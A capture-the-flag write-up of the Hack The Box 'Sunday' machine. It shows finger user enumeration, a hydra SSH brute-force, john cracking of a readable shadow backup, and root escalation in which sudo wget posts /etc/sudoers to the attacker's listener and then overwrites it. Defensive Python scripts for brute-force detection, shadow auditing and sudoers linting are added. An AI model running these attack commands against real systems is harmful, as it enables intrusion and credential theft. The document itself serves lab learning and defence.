Disclaimer

The host penetrated in this article was tested with authorization. The tools and methods used here are for learning and exchange only. Do not use the tools or the penetration approach described in this article for any illegal purpose; I take no responsibility for any consequences that result, nor for any misuse or damage caused.

Service discovery

This box is extremely unstable. First, use the --open parameter to see which ports are open:

┌──(root㉿kali)-[~/htb/Sunday]
└─# nmap -p- 10.10.10.76 --open
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 09:22 EST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.35% done; ETC: 09:32 (0:09:46 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.30s latency).
Not shown: 44865 filtered ports, 20665 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
79/tcp    open  finger
111/tcp   open  rpcbind
22022/tcp open  unknown
47097/tcp open  unknown
58984/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 653.01 seconds

Now target those ports and get detailed service information:

┌──(root㉿kali)-[~/htb/Sunday]
└─# nmap -sV -sC 10.10.10.76 -A -O -p 79,111,22022,47097,58984
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 09:36 EST
Nmap scan report for 10.10.10.76
Host is up (0.30s latency).

PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
47097/tcp open  unknown
58984/tcp open  unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 21 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

TRACEROUTE (using port 79/tcp)
HOP RTT        ADDRESS
1   306.96 ms  10.10.14.1
2   2362.53 ms 10.10.14.1
3   2362.68 ms 10.10.14.1
4   ... 10
11  3138.72 ms 10.10.14.1
12  2460.64 ms 10.10.14.1
13  ... 20
21  297.28 ms  10.10.10.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.18 seconds

finger service

Port 79 is described like this on HackTricks:

Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.

In other words, this service echoes back some of the target's user information, for example:

┌──(root㉿kali)-[~/htb/sunday]
└─# finger root@10.10.10.76
Login       Name               TTY         Idle    When    Where
root     Super-User            pts/3        <Apr 24, 2018> sunday

But if you query a user that does not exist, nothing comes back:

┌──(root㉿kali)-[~/htb/sunday]
└─# finger asdjkasjd@10.10.10.76
Login       Name               TTY         Idle    When    Where
asdjkasjd             ???

So, using this behaviour, we can find out which users really exist on the target.

Using this wordlist

together with the scanner/finger/finger_users module in msf, the following users were detected:

msf6 auxiliary(scanner/finger/finger_users) > run

[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nobody
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: noaccess
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nobody4
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: uucp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nuucp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: listen
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: smmsp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sammy
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sunny
[+] 10.10.10.76:79        - 10.10.10.76:79 Users found: adm, dladm, listen, lp, noaccess, nobody, nobody4, nuucp, sammy, smmsp, sunny, uucp
[*] 10.10.10.76:79        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sammy and sunny look like the users most likely to be able to log in over ssh. Let's test:

┌──(root㉿kali)-[~/htb/sunday]
└─# finger sammy@10.10.10.76
Login       Name               TTY         Idle    When    Where
sammy    sammy                 console      <Jul 31, 2020>

┌──(root㉿kali)-[~/htb/sunday]
└─# finger sunny@10.10.10.76
Login       Name               TTY         Idle    When    Where
sunny    sunny                 pts/3        <Apr 24, 2018> 10.10.14.4

Save them to user.txt and use hydra to brute-force ssh:

┌──(root㉿kali)-[~/htb/Sunday]
└─# hydra -L /root/htb/sunday/user.txt -P /usr/share/wordlists/rockyou.txt -I -f -s 22022 10.10.10.76 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 10:59:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 10:59:23

We get an ssh credential: sunny : sunday
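From the defender's side, the credential hydra just found shows up in the sshd log as a burst of failed logins followed by an accepted password from the same source address. The following Python script is an added example (it is not part of this write-up, nor of hydra or any other tool used here): it parses constructed sshd lines in OpenSSH syslog format, raises a brute-force alert once one source crosses a failure threshold inside a time window, and raises a second, higher-priority alert when a login from that source succeeds while the window is still hot. The log format is an assumption; the box's SunSSH 1.3 logs differently, so adapt LINE_RE to the real output.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd lines in OpenSSH syslog format (assumption: SunSSH on
# the box logs differently). The source address is the attacking Kali host
# from the write-up; the timestamps mirror the hydra run.
SAMPLE_LOG = """\
Dec 16 10:59:18 sunday sshd[1201]: Failed password for invalid user sammy from 10.10.14.6 port 41122 ssh2
Dec 16 10:59:19 sunday sshd[1202]: Failed password for sunny from 10.10.14.6 port 41124 ssh2
Dec 16 10:59:20 sunday sshd[1203]: Failed password for sammy from 10.10.14.6 port 41126 ssh2
Dec 16 10:59:21 sunday sshd[1204]: Failed password for sunny from 10.10.14.6 port 41128 ssh2
Dec 16 10:59:22 sunday sshd[1205]: Failed password for sunny from 10.10.14.6 port 41130 ssh2
Dec 16 10:59:23 sunday sshd[1206]: Accepted password for sunny from 10.10.14.6 port 41132 ssh2
Dec 16 11:30:00 sunday sshd[1300]: Accepted publickey for sammy from 10.10.14.9 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)


def parse_auth_events(log_text):
    """Return a list of (timestamp, source, user, accepted) for each auth result line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd chatter is ignored
        # syslog timestamps carry no year; that is fine for ordering within one log
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Alert when a source reaches `threshold` failures inside `window`, and
    separately when such a source then logs in successfully (likely guessed password)."""
    failures = defaultdict(list)   # src -> timestamps of recent failures
    tried = defaultdict(set)       # src -> usernames attempted (never expires in this demo)
    alerts = []
    for ts, src, user, accepted in parse_auth_events(log_text):
        recent = failures[src]
        recent[:] = [t for t in recent if ts - t <= window]  # slide the window forward
        if accepted:
            if len(recent) >= threshold:
                alerts.append({"type": "success_after_bruteforce", "src": src,
                               "user": user, "failures": len(recent),
                               "users_tried": sorted(tried[src]), "at": ts})
            continue
        recent.append(ts)
        tried[src].add(user)
        if len(recent) == threshold:   # fire once when the threshold is crossed
            alerts.append({"type": "bruteforce", "src": src, "failures": len(recent),
                           "users_tried": sorted(tried[src]), "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The success-after-failures alert is the one worth paging on: a plain burst of failures is background noise on any exposed sshd, but a success from the same source inside the window means a guessed credential is now in use, which is exactly what happens with sunny : sunday above.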

Initial shell

sunny@sunday:~/Documents$ find / -name user.txt
find: /export/home/sammy/.gnome2: Permission denied
find: /export/home/sammy/.gconf: Permission denied
/export/home/sammy/Desktop/user.txt

user.txt is in sammy's home directory and we have no permission to read it, so it looks like we need to move laterally to sammy.

In the backup directory we find a backup copy of shadow:

sunny@sunday:/backup$ ls
agent22.backup  shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Write two files, passwd and shadow:

┌──(root㉿kali)-[~/htb/Sunday]
└─# cat passwd
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash

┌──(root㉿kali)-[~/htb/Sunday]
└─# cat shadow
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

Use the unshadow command to merge the two files above into a single hash file that john can recognize:

┌──(root㉿kali)-[~/htb/Sunday]
└─# unshadow passwd shadow > pass.hash

Crack this hash file:

┌──(root㉿kali)-[~/htb/Sunday]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:01:11 DONE (2021-12-16 21:35) 0.01393g/s 2839p/s 2839c/s 2839C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we have sammy's ssh password: cooldude!
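The shadow backup is the weak point of this box: it sits in /backup where an unprivileged user can read it, and it still carries live sha256crypt hashes at the default 5000 rounds, which is why john's "Cost 1 (iteration count) is 5000" run cracked sammy's password in just over a minute. The following Python audit is an added example, not code from this write-up or from john: it classifies each password field of a shadow-format file (locked, no password, or a real hash and its algorithm), reports the work factor where the hash format encodes it, and lists any backup copies whose mode grants read to group or others. The shadow lines embedded below are the ones the write-up retrieved from the box; the candidate backup paths in the usage section are assumptions.

```python
import os
import stat

# Shadow-format lines as found in /backup/shadow.backup on the box (from the write-up).
SHADOW_BACKUP = """\
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) identifiers -> algorithm name
HASH_IDS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
            "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt", "$y$": "yescrypt"}


def classify_hash(field):
    """Label one shadow password field: 'locked', 'no-password', or the hash algorithm."""
    if field.startswith("*LK*") or field in ("", "*", "!", "!!"):
        return "locked"           # Solaris *LK*, Linux ! or *: no password login possible
    if field in ("NP", "*NP*"):
        return "no-password"      # Solaris: password authentication disabled
    for prefix, name in HASH_IDS.items():
        if field.startswith(prefix):
            return name
    return "descrypt-or-unknown"  # traditional 13-char DES crypt has no $id$ prefix


def crypt_rounds(field):
    """Work factor encoded in the hash, or None when the scheme has no explicit cost.
    sha256crypt/sha512crypt default to 5000 rounds when 'rounds=' is absent."""
    parts = field.split("$")      # '', id, [rounds=N | cost], salt, ...
    if field.startswith(("$5$", "$6$")):
        if parts[2].startswith("rounds="):
            return int(parts[2][len("rounds="):])
        return 5000
    if field.startswith(("$2a$", "$2b$", "$2y$")):
        return 2 ** int(parts[2])  # bcrypt cost is log2 of the iteration count
    return None


def audit_shadow(text):
    """Return {account: (algorithm, rounds)} for every account that still has a real,
    offline-crackable hash; locked and no-password accounts are skipped."""
    findings = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, pw_field = line.split(":", 2)[:2]
        kind = classify_hash(pw_field)
        if kind not in ("locked", "no-password"):
            findings[name] = (kind, crypt_rounds(pw_field))
    return findings


def readable_by_others(paths):
    """Return the existing paths whose mode grants read permission to group or others."""
    hits = []
    for p in paths:
        try:
            mode = os.stat(p).st_mode
        except OSError:
            continue  # missing or inaccessible: nothing to report for this path
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            hits.append(p)
    return hits


if __name__ == "__main__":
    print(audit_shadow(SHADOW_BACKUP))
    # Candidate locations are assumptions; /backup/shadow.backup is the box's own path.
    print(readable_by_others(["/backup/shadow.backup", "/etc/shadow", "/etc/shadow-"]))
```

Run as root on a host, the two prints give the triage list: which accounts would be exposed if a copy of shadow leaked, and which copies are already readable by someone other than root. For the box above the answer is sammy and sunny, both sha256crypt at the default cost, from a file anyone logged in could cat.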

Privilege escalation

Check sammy's sudo privileges:

sunny@sunday:/home$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

wget can be run as root, so this command can be used to escalate to root. The steps are as follows:

  1. Start a listener on kali to receive the file

    nc -lnvp 80

  2. Send the file to kali

    sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.14.6

  3. The sudoers file arrives at the listener

    ┌──(root㉿kali)-[~/htb/Sunday]
    └─# nc -lnvp 80
    listening on [any] 80 ...
    connect to [10.10.14.6] from (UNKNOWN) [10.10.10.76] 38814
    POST / HTTP/1.0
    User-Agent: Wget/1.10.2
    Accept: */*
    Host: 10.10.14.6
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 795

    # sudoers file.
    #
    # This file MUST be edited with the 'visudo' command as root.
    # Failure to use 'visudo' may result in syntax or file permission errors
    # that prevent sudo from running.
    #
    # See the sudoers man page for the details on how to write a sudoers file.
    #

    # Host alias specification

    # User alias specification

    # Cmnd alias specification

    # Defaults specification

    # Runas alias specification

    # User privilege specification
    root    ALL=(ALL) ALL

    # Uncomment to allow people in group wheel to run all commands
    # %wheel        ALL=(ALL) ALL

    # Same thing without a password
    # %wheel        ALL=(ALL) NOPASSWD: ALL

    # Samples
    # %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
    # %users  localhost=/sbin/shutdown -h now
    sammy ALL=(root) NOPASSWD: /usr/bin/wget
    sunny ALL=(root) NOPASSWD: /root/troll

  4. Save the content above locally as sudoers and append the following line at the bottom

    sammy ALL=(root) NOPASSWD: /bin/bash

  5. Start an http server on kali

    python3 -m http.server

  6. On the target, fetch the file and overwrite /etc/sudoers with it

    sudo /usr/bin/wget http://10.10.14.6:8000/sudoers -O /etc/sudoers

    sunny@sunday:/home$ sudo /usr/bin/wget http://10.10.14.6:8000/sudoers -O /etc/sudoers
    --08:27:33--  http://10.10.14.6:8000/sudoers
               => `/etc/sudoers'
    Connecting to 10.10.14.6:8000... 已连接。
    已发出 HTTP 请求，正在等待回应... 200 OK
    长度：850 [application/octet-stream]

    100%[================================================================================================================================================================================================>] 850           --.--K/s

    08:27:34 (1.01 MB/s) - `/etc/sudoers' saved [850/850]

Checking again, we now have the bash privilege:

sunny@sunday:/home$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
    (root) NOPASSWD: /bin/bash

Escalate directly to root:

sunny@sunday:/home$ sudo /bin/bash -p
root@sunday:/home# id
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
root@sunday:/home# whoami
root
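A sudoers rule that lets a user run a download tool as root, with no password and no argument restriction, is root access with one extra step, as the wget sequence above shows (read /etc/sudoers out, write a modified copy back). The following Python sudoers linter is an added example, not code from this write-up or from the sudo project: it parses user specifications, applies NOPASSWD/PASSWD tags per command the way sudoers does, and grades each non-root rule so that both the original wget line and the appended /bin/bash line are caught. The embedded sudoers text is the one retrieved from the box (comment lines shortened) plus the appended line; the list of risky binaries is an assumption to extend for your platform, and the parser treats every '#' as a comment, so #include directives are not followed.

```python
import re

# /etc/sudoers as retrieved from the box in the write-up (comments shortened),
# plus the line the write-up appends, so the post-compromise state is graded too.
SAMPLE_SUDOERS = """\
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
# User privilege specification
root    ALL=(ALL) ALL
# %wheel        ALL=(ALL) NOPASSWD: ALL
sammy ALL=(root) NOPASSWD: /usr/bin/wget
sunny ALL=(root) NOPASSWD: /root/troll
sammy ALL=(root) NOPASSWD: /bin/bash
"""

SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
# Assumed list: binaries that, run as root, read or overwrite arbitrary files
# (the write-up's wget is the example) or hand out a shell. Extend for your platform.
RISKY = {"/usr/bin/wget", "/usr/bin/curl", "/bin/bash", "/bin/sh",
         "/usr/bin/bash", "/usr/bin/sh", "/usr/bin/vi", "/usr/bin/vim"}


def parse_sudoers(text):
    """Flatten user specifications into one dict per command.
    Simplification: every '#' starts a comment, so #include directives are not followed."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags = set()  # tags persist across the command list until changed, as in sudoers
        for cmd in m["rest"].split(","):
            tokens = cmd.split()
            while tokens and tokens[0].endswith(":") and tokens[0][:-1] in TAGS:
                tag = tokens.pop(0)[:-1]
                if tag == "PASSWD":
                    tags.discard("NOPASSWD")
                else:
                    tags.add(tag)
            if not tokens:
                continue
            rules.append({"user": m["user"], "host": m["host"],
                          "runas": m["runas"] or "root",  # sudoers default runas user
                          "tags": set(tags), "binary": tokens[0],
                          "args": " ".join(tokens[1:]) or None})
    return rules


def audit_sudoers(text):
    """Grade every non-root rule: 'high' for ALL or an unrestricted risky binary,
    'medium' for a risky binary with fixed arguments, 'low' for NOPASSWD elsewhere."""
    findings = []
    for r in parse_sudoers(text):
        if r["user"] == "root":
            continue
        reasons, severity = [], None
        if r["binary"] == "ALL":
            reasons.append("any command as %s" % r["runas"])
            severity = "high"
        elif r["binary"] in RISKY:
            reasons.append("%s can read/write arbitrary files or spawn a shell as %s"
                           % (r["binary"], r["runas"]))
            if r["args"] is None:
                reasons.append("arguments are not restricted")
                severity = "high"
            else:
                reasons.append("arguments fixed; verify they cannot be abused")
                severity = "medium"
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
            severity = severity or "low"
        if severity:
            findings.append({"user": r["user"], "command": r["binary"],
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f["severity"].upper(), f["user"], f["command"], "; ".join(f["reasons"]))
```

Running the linter over a baseline copy of sudoers and again after any change is also a cheap integrity check: the appended /bin/bash rule shows up as a new high finding, and a diff of the two runs is far easier to alert on than the file itself.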

Summary

The entry point was the user information leaked by finger, from which we worked our way into the system step by step; privilege escalation was simple as well. But this box is really unstable and the experience was poor; on the forum a bunch of people were complaining about it too.
When enumerating finger you don't need msf; there are plenty of enumeration scripts on GitHub.